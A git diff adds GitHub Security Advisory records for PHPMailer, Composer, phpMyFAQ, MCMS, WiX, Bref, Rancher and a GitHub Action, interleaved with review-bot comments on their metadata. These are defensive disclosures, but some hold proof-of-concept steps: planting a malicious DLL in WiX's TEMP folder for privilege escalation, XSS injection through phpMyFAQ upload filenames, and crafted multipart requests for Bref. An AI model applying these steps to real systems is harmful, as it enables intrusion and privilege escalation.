+ "details": "PHPMailer before 1.7.4, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in `class.phpmailer.php`.\n\n### Impact\nShell command injection, remotely exploitable if host application does not filter user data appropriately.\n\n### Patches\nFixed in 1.7.4\n\n### Workarounds\nFilter and validate user-supplied data before putting in the into the `Sender` property.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2007-3215\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "phpmailer/phpmailer"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.7.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-6h78-85v2-mmch"
+ },
+ {
+ "type": "WEB",
+ "url": "https://cxsecurity.com/issue/WLB-2007060063"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34818"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/PHPMailer/PHPMailer"
+ },
+ {
+ "type": "WEB",
+ "url": "https://seclists.org/fulldisclosure/2011/Oct/223"
+ },
+ {
+ "type": "WEB",
+ "url": "https://sourceforge.net/p/phpmailer/bugs/192/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20070714054359/http://larholm.com/2007/06/11/phpmailer-0day-remote-execution/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T20:43:55Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-7c6p-848j-wh5h/GHSA-7c6p-848j-wh5h.json b/advisories/github-reviewed/2024/02/GHSA-7c6p-848j-wh5h/GHSA-7c6p-848j-wh5h.json
new file mode 100644
index 0000000000000..5d617929fd8ed
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-7c6p-848j-wh5h/GHSA-7c6p-848j-wh5h.json
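Review bot: `nvd_published_at` is `null` even though the record aliases CVE-2007-3215 and the `details` text itself links the NVD entry for that CVE; the publication timestamp from that entry would normally populate the field, and leaving it null makes the record look unpublished to consumers that key on it. `cwe_ids` is empty for an issue summarized as shell command injection via metacharacters, for which CWE-78 (OS Command Injection) is the standard classification. Two wording issues in `details` are worth fixing at source: "putting in the into the `Sender` property" has a doubled phrase, and the `### References` section repeats the NVD link that the `references` array does not carry.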
@@ -0,0 +1,84 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7c6p-848j-wh5h",
+ "modified": "2024-02-08T15:06:38Z",
+ "published": "2024-02-08T15:06:38Z",
+ "aliases": [
+ "CVE-2024-24821"
+ ],
+ "summary": "Composer code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php",
+ "details": "### Impact\n\nSeveral files within the local working directory are included during the invocation of Composer and in the context of the executing user.\n\nAs such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files.\n\nAll Composer CLI commands are affected, including composer.phar's self-update.\n\nThe following are of high risk:\n\n- Composer being run with sudo.\n- Pipelines which may execute Composer on untrusted projects.\n- Shared environments with developers who run Composer individually on the same project.\n\n### Patches\n\n2.7.0, 2.2.23\n\n### Workarounds\n\n- It is advised that the patched versions are applied at the earliest convenience.\n\nWhere not possible, the following should be addressed:\n- Remove all sudo composer privileges for all users to mitigate root privilege escalation. \n- Avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. \n\nA reset can also be done on these files by the following:\n\n```sh\nrm vendor/composer/installed.php vendor/composer/InstalledVersions.php\ncomposer install --no-scripts --no-plugins\n```",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "composer/composer"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.0.0-alpha1"
+ },
+ {
+ "fixed": "2.2.23"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "composer/composer"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.3.0-rc1"
+ },
+ {
+ "fixed": "2.7.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/composer/composer/commit/77e3982918bc1d886843dc3d5e575e7e871b27b7"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/composer/composer"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T15:06:38Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-7f32-hm4h-w77q/GHSA-7f32-hm4h-w77q.json b/advisories/github-reviewed/2024/02/GHSA-7f32-hm4h-w77q/GHSA-7f32-hm4h-w77q.json
new file mode 100644
index 0000000000000..e82a05c66009d
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-7f32-hm4h-w77q/GHSA-7f32-hm4h-w77q.json
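Review bot: `cwe_ids` is empty although the `details` describe Composer including `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` from the working directory and running them as the invoking user; CWE-829 (Inclusion of Functionality from Untrusted Control Sphere) describes exactly that mechanism and would let consumers group this with similar file-inclusion issues. The `### Patches` section lists only "2.7.0, 2.2.23" without saying which release line each applies to; the two `affected` ranges make this clear structurally, but a short phrase in `details` mapping 2.2.23 to the 2.2.x range and 2.7.0 to the 2.3+ range would spare readers the cross-reference.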
@@ -0,0 +1,79 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7f32-hm4h-w77q",
+ "modified": "2024-02-03T00:22:22Z",
+ "published": "2024-02-03T00:22:22Z",
+ "aliases": [
+
+ ],
+ "summary": "github-slug-action use of `set-env` Runner commands which are processed via stdout",
+ "details": "### Impact\nThis GitHub Action use `set-env` runner commands which are processed via stdout related to GHSA-mfwh-5m23-j46w\n\n### Patches\nThe following versions use the recommended [Environment File Syntax](https://github.com/actions/toolkit/blob/main/docs/commands.md#environment-files).\n\n- 2.1.1\n- 1.1.1\n\n### Workarounds\nNone, it is strongly suggested that you upgrade as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [rlespinasse/github-slug-action](https://github.com/rlespinasse/github-slug-action)\n",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "GitHub Actions",
+ "name": "rlespinasse/github-slug-action"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.1.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.1.0"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "GitHub Actions",
+ "name": "rlespinasse/github-slug-action"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.0.0"
+ },
+ {
+ "fixed": "2.1.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2.1.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rlespinasse/github-slug-action/security/advisories/GHSA-7f32-hm4h-w77q"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rlespinasse/github-slug-action"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:22:22Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-7m8g-fprr-47fx/GHSA-7m8g-fprr-47fx.json b/advisories/github-reviewed/2024/02/GHSA-7m8g-fprr-47fx/GHSA-7m8g-fprr-47fx.json
new file mode 100644
index 0000000000000..11dd61084721b
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-7m8g-fprr-47fx/GHSA-7m8g-fprr-47fx.json
@@ -0,0 +1,74 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7m8g-fprr-47fx",
+ "modified": "2024-02-05T23:08:13Z",
+ "published": "2024-02-05T20:22:05Z",
+ "aliases": [
+ "CVE-2024-24574"
+ ],
+ "summary": "phpMyFAQ vulnerable to stored XSS on attachments filename",
+ "details": "### Summary\nUnsafe echo of filename in phpMyFAQ\\phpmyfaq\\admin\\attachments.php leading to allow execute JavaScript code in client side (XSS)\n\n### Details\nOn that snippet code of rendering the file attachments from user tables\n\n```\n\n id ?>\" title=\"thema ?>\">\n id ?>\n filename ?>\n record_lang ?>\n filesize) ?>\n mime_type ?>\n \n```\n\nThe data directly rendering with short hand echo without any sanitation first, its recommend to use existing class of `Strings::htmlentities` on use `phpMyFAQ\\Strings;`\n\n```\nfilename); ?>\nrecord_lang); ?>\nfilesize) ?>\nmime_type); ?>\n```\n\nPropose fixing on that pull request https://github.com/thorsten/phpMyFAQ/pull/2827\n\n### PoC\n1. An attacker with permission will upload the attachments image on [http://{base_url}/admin/?action=editentry](http://{base_url}/admin/?action=editentry)\n2. On endpoint of ajax upload image POST /admin/index.php?action=ajax&ajax=att&ajaxaction=upload \n3. Change the originally name file on parameters filename to a XSS payload \n4. The XSS will trigger on attachment pages /admin/?action=attachments\n\n- Trigger XSS\n![image](https://user-images.githubusercontent.com/37658579/301022211-81da265b-5dce-48bd-a043-8bae0991fe46.png)\n\n- Payload XSS\n\"image\"\n\n\n\n\n### Impact\n\nThis vulnerability will allow an attacker with a permissions of uploading an attachment to storing the payload of XSS on database specific table `faqattachment` columns `filename.`\n\nThe XSS payload could be rendering on page that listing the file on tables, and impact to others user that on the hierarchy. \n\nThe payload XSS have several attack scenario such like \n\n1. Stealing the cookies (isn’t possible since HttpOnly)\n2. Crashing the application with a looping javascript payload\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "phpmyfaq/phpmyfaq"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.2.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7m8g-fprr-47fx"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24574"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/thorsten/phpMyFAQ/pull/2827"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/thorsten/phpMyFAQ/commit/5479b4a4603cce71aa7eb4437f1c201153a1f1f5"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/thorsten/phpMyFAQ"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.phpmyfaq.de/security/advisory-2024-02-05"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79",
+ "CWE-80"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T20:22:05Z",
+ "nvd_published_at": "2024-02-05T21:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-7qw4-9r68-2rmx/GHSA-7qw4-9r68-2rmx.json b/advisories/github-reviewed/2024/02/GHSA-7qw4-9r68-2rmx/GHSA-7qw4-9r68-2rmx.json
new file mode 100644
index 0000000000000..72092cf9d917d
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-7qw4-9r68-2rmx/GHSA-7qw4-9r68-2rmx.json
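Review bot: The CVSS vector carries `PR:N`, but the `details` PoC and Impact sections both say the attacker needs permission to upload attachments in the admin area; that is a privileges-required condition, so the vector and the prose disagree and `PR:L` looks like the intended value. The two code snippets in `details` have lost their PHP tags (only fragments such as `id ?>\" title=\"thema ?>\">` and `filename); ?>` remain), presumably stripped as HTML on import, so neither the vulnerable short-echo nor the proposed `Strings::htmlentities` fix is actually readable; re-escaping the snippets so the `<?=` expressions survive would make the write-up usable for anyone auditing similar templates.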
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7qw4-9r68-2rmx",
+ "modified": "2024-02-05T22:34:09Z",
+ "published": "2024-02-05T21:30:31Z",
+ "aliases": [
+ "CVE-2024-22567"
+ ],
+ "summary": "mingSoft MCMS File Upload vulnerability",
+ "details": "File Upload vulnerability in MCMS 5.3.5 allows attackers to upload arbitrary files via crafted POST request to /ms/file/upload.do.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "net.mingsoft:ms-mcms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "5.3.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22567"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/h3ak/MCMS-CVE-Request/"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ming-soft/MCMS"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T22:34:09Z",
+ "nvd_published_at": "2024-02-05T20:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-7wh2-wxc7-9ph5/GHSA-7wh2-wxc7-9ph5.json b/advisories/github-reviewed/2024/02/GHSA-7wh2-wxc7-9ph5/GHSA-7wh2-wxc7-9ph5.json
new file mode 100644
index 0000000000000..4025f57f49ff5
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-7wh2-wxc7-9ph5/GHSA-7wh2-wxc7-9ph5.json
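Review bot: `cwe_ids` is empty for an issue summarized as arbitrary file upload, for which CWE-434 (Unrestricted Upload of File with Dangerous Type) is the standard classification and would let consumers group it with similar findings. The range ends in `last_affected` 5.3.5 with no `fixed` event, and the only non-NVD reference is a third-party CVE-request repository rather than a vendor commit or release, so the record gives consumers no remediation signal; if a fix exists it should be recorded as a `fixed` event and a reference, and otherwise a sentence in `details` stating that no fixed version is known would set expectations.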
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7wh2-wxc7-9ph5", + "modified": "2024-02-08T18:23:49Z", + "published": "2024-02-08T18:23:49Z", + "aliases": [ + "CVE-2024-24810" + ], + "summary": "WiX Toolset's .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", + "details": "### Summary\n.be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges.\n\n### Details\nIf the bundle is not run as admin, the user's TEMP folder is used and not the system TEMP folder. A utility is able to monitor the user's TEMP folder for changes and drop its own DLL into the **.be/.Local** folder immediately when the .be folder is created. When the burn engine elevates, the malicious DLL receives elevated privileges.\n\n### PoC\nAs a standard, non-admin user:\n1. Monitor the user's TEMP folder for changes using ReadDirectoryChangesW\n2. On FILE_ACTION_ADDED, check if the folder name is .be\n3. Create a folder in .be named after the bundle + .Local (e.g. MyInstaller.exe.Local)\n4. Put the malicious COMCTL32.DLL in the .Local folder following the naming used for the real DLL (e.g. MyInstaller.exe.Local/x86_microsoft.windows.common-controls_.../COMCTL32.dll)\n5. Do hacker things when the engine escalates and the malicious DLL is loaded\n\nProper naming for the path can be obtained by using GetModuleHandle(\"comctl32.dll\") and GetModuleFileName.\n\n### Impact\nDLL redirection utilizing .exe.Local Windows capability. 
This impacts any installer built with the WiX installer framework.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "WiX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.0.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.0.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/wixtoolset/issues/security/advisories/GHSA-7wh2-wxc7-9ph5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24810" + }, + { + "type": "WEB", + "url": "https://github.com/wixtoolset/wix/commit/fec38b6461d0551339139a2fe52403a61942adc0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/wixtoolset/wix" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:23:49Z", + "nvd_published_at": "2024-02-07T03:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-82vx-mm6r-gg8w/GHSA-82vx-mm6r-gg8w.json b/advisories/github-reviewed/2024/02/GHSA-82vx-mm6r-gg8w/GHSA-82vx-mm6r-gg8w.json new file mode 100644 index 0000000000000..e2bd7e4746cb9 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-82vx-mm6r-gg8w/GHSA-82vx-mm6r-gg8w.json 
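Review bot: The `fixed: 4.0.4` boundary on the NuGet `WiX` package records when the build tool was patched, but the details place the flaw in the Burn engine that is embedded into every bundle, so installers already produced with an earlier SDK stay exploitable until they are rebuilt — a dependency scanner matching this range will not see those shipped artifacts. Consider stating that in `details`, e.g. `Bundles built with an affected version remain vulnerable until rebuilt with WiX 4.0.4 or later.` The range also starts at `0`, so it covers the WiX 3.x line while the only listed fix is in the 4.x series; if 3.x is affected, a separate `fixed` (or `last_affected`) event for that series would make the record actionable for 3.x users.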
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82vx-mm6r-gg8w", + "modified": "2024-02-01T22:47:29Z", + "published": "2024-02-01T22:47:29Z", + "aliases": [ + "CVE-2024-24754" + ], + "summary": "Bref vulnerable to Body Parsing Inconsistency in Event-Driven Functions", + "details": "## Impacted Resources\n\nbref/src/Event/Http/Psr7Bridge.php:130-168\n\n## Description\n\nWhen Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object.\nDuring the conversion process, if the request is a MultiPart, each part is parsed and its content added in the `$files` or `$parsedBody` arrays.\nTo do that, the following method is called with as first argument the result array (`$files` or `$parsedBody`), as second argument the part name, and as third argument the part content:\n\n```php\n/**\n * Parse a string key like \"files[id_cards][jpg][]\" and do $array['files']['id_cards']['jpg'][] = $value\n */\nprivate static function parseKeyAndInsertValueInArray(array &$array, string $key, mixed $value): void\n{\n if (! str_contains($key, '[')) {\n $array[$key] = $value;\n\n return;\n }\n\n $parts = explode('[', $key); // files[id_cards][jpg][] => [ 'files', 'id_cards]', 'jpg]', ']' ]\n $pointer = &$array;\n\n foreach ($parts as $k => $part) {\n if ($k === 0) {\n $pointer = &$pointer[$part];\n\n continue;\n }\n\n // Skip two special cases:\n // [[ in the key produces empty string\n // [test : starts with [ but does not end with ]\n if ($part === '' || ! 
str_ends_with($part, ']')) {\n // Malformed key, we use it \"as is\"\n $array[$key] = $value;\n\n return;\n }\n\n $part = substr($part, 0, -1); // The last char is a ] => remove it to have the real key\n\n if ($part === '') { // [] case\n $pointer = &$pointer[];\n } else {\n $pointer = &$pointer[$part];\n }\n }\n\n $pointer = $value;\n}\n```\n\nThe conversion process produces a different output compared to the one of plain PHP when keys ending with and open square bracket (`[`) are used.\n\nLet's take for example the following part:\n```\n------WebKitFormBoundary\nContent-Disposition: form-data; name=\"key0[key1][key2][\"\n\nvalue\n------WebKitFormBoundary--\n```\n\nIn plain PHP it would be converted to `Array( [key0] => Array ( [key1] => Array ( [key2] => value) ) )`, while in Bref it would be converted to `Array( [key0] => Array ( [key1] => Array ( [key2] => ) ) [key0[key1][key2][] => value )`.\n\n## Impact\n\nBased on the application logic the difference in the body parsing might lead to vulnerabilities and/or undefined behaviors.\n\n## PoC\n\n1. Create a new Bref project.\n2. Create an `index.php` file with the following content:\n```php\ngetParsedBody(),true));\n }\n}\n\nreturn new MyHttpHandler();\n\n```\n3. Use the following `serverless.yml` to deploy the Lambda:\n```yaml\nservice: app\n\nprovider:\n name: aws\n region: eu-central-1\n\nplugins:\n - ./vendor/bref/bref\n\n# Exclude files from deployment\npackage:\n patterns:\n - '!node_modules/**'\n - '!tests/**'\n\nfunctions:\n api:\n handler: index.php\n runtime: php-83\n events:\n - httpApi: 'ANY /upload'\n```\n4. 
Replay the following request after having replaced the `` placeholder with the deployed Lambda domain:\n```\nPOST /upload HTTP/2\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Length: 180\n\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Disposition: form-data; name=\"key0[key1][key2][\"\n\nvalue\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb--\n```\n5. Notice how the body has been parsed.\n6. Create a `plain.php` file with the following content:\n```php\n` placeholder with the PHP server address:\n```\nPOST /plain.php HTTP/1.1\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Length: 180\n\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Disposition: form-data; name=\"key0[key1][key2][\"\n\nvalue\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb--\n```\n9. Notice the differences in the parsing compared to what observed at step 5.\n\n## Suggested Remediation\n\nUse the PHP function [`parse_str`](https://www.php.net/manual/en/function.parse-str.php) to parse the body parameters to mimic the plain PHP behavior.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "bref/bref" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/security/advisories/GHSA-82vx-mm6r-gg8w" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24754" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/commit/c77d9f5abf021f29fa96b5720b7b84adbd199092" + }, + { + "type": "PACKAGE", + "url": "https://github.com/brefphp/bref" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/blob/2.1.12/src/Event/Http/Psr7Bridge.php#L130-L168" + } + ], + 
"database_specific": { + "cwe_ids": [ + "CWE-436" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T22:47:29Z", + "nvd_published_at": "2024-02-01T16:17:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-833m-37f7-jq55/GHSA-833m-37f7-jq55.json b/advisories/github-reviewed/2024/02/GHSA-833m-37f7-jq55/GHSA-833m-37f7-jq55.json new file mode 100644 index 0000000000000..0eca9c9633819 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-833m-37f7-jq55/GHSA-833m-37f7-jq55.json 
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-833m-37f7-jq55", + "modified": "2024-02-08T18:46:23Z", + "published": "2024-02-08T18:46:23Z", + "aliases": [ + "CVE-2023-32192" + ], + "summary": "Rancher API Server Cross-site Scripting Vulnerability", + "details": "### Impact\nA vulnerability has been identified in which unauthenticated cross-site scripting (XSS) in the API Server's public API endpoint can be exploited. This can lead to an attacker exploiting the vulnerability to trigger JavaScript code and execute commands remotely. \n\nThe attack vector was identified as a Reflected XSS.\n\nAPI Server propagates malicious payloads from user input to the UI, which renders the output. For example, a malicious URL gets rendered into a script that is executed on a page.\n\nThe changes addressed by this fix are:\n- Encode input that comes from the request URL before adding it to the response.\n- The request input is escaped by changing the URL construction that is used for links to use `url.URL`.\n- The request input is escaped by escaping the JavaScript and CSS variables with attribute encoding as defined by [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary).\n\n### Patches\nPatched versions include the following commits:\n\n| Branch | Commit |\n| -------- | ------- |\n| master | 4fd7d82 |\n| release/v2.8 | 69b3c2b |\n| release/v2.8.s3 | a3b9e37 |\n| release/v2.7 | 4e102cf |\n| release/v2.7.s3 | 97a10a3 |\n| release/v2.6 | 4df268e |\n\n### Workarounds\nThere is no direct mitigation besides updating API Server to a patched version.\n\n### References\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security-related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support 
matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/apiserver" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20240207153957-4fd7d821d952" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/security/advisories/GHSA-833m-37f7-jq55" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/4df268e250f625fa323349062636496e0aeff4e4" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/4e102cf0d07b1af3d10d82c3e5a751a869b8a6c7" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/4fd7d821d952510bfe38c9d4a3e2a65157f50525" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/69b3c2b56f3fa5a421889c533dada8cd08783cda" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/97a10a30200cb851afd8ee85ee6b2295c4b6e5ee" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/apiserver/commit/a3b9e3721c1b558ee63aec9594e37c223a5c8437" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rancher/apiserver" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:46:23Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-84x2-2qv6-qg56/GHSA-84x2-2qv6-qg56.json b/advisories/github-reviewed/2024/02/GHSA-84x2-2qv6-qg56/GHSA-84x2-2qv6-qg56.json new file mode 100644 index 0000000000000..0f79f07fc5865 --- /dev/null 
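Review bot: The single `fixed` event `0.0.0-20240207153957-4fd7d821d952` is the pseudo-version of the master commit, while the details table lists distinct backport commits on release/v2.6, v2.7 and v2.8 (and the `.s3` branches); a consumer pinned to a release-branch pseudo-version is compared purely by commit timestamp against that master timestamp, so a backport committed before 2024-02-07T15:39:57Z would still be flagged vulnerable and a later one marked fixed regardless of branch. One `affected` entry per branch with that branch's own pseudo-version, or at least the tagged releases named in `details`, would remove the ambiguity. The `Workarounds` section says there is no mitigation besides upgrading; since this is reflected XSS sourced from the request URL, a response `Content-Security-Policy` that forbids inline script is at least worth mentioning as defense in depth where the UI tolerates it.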
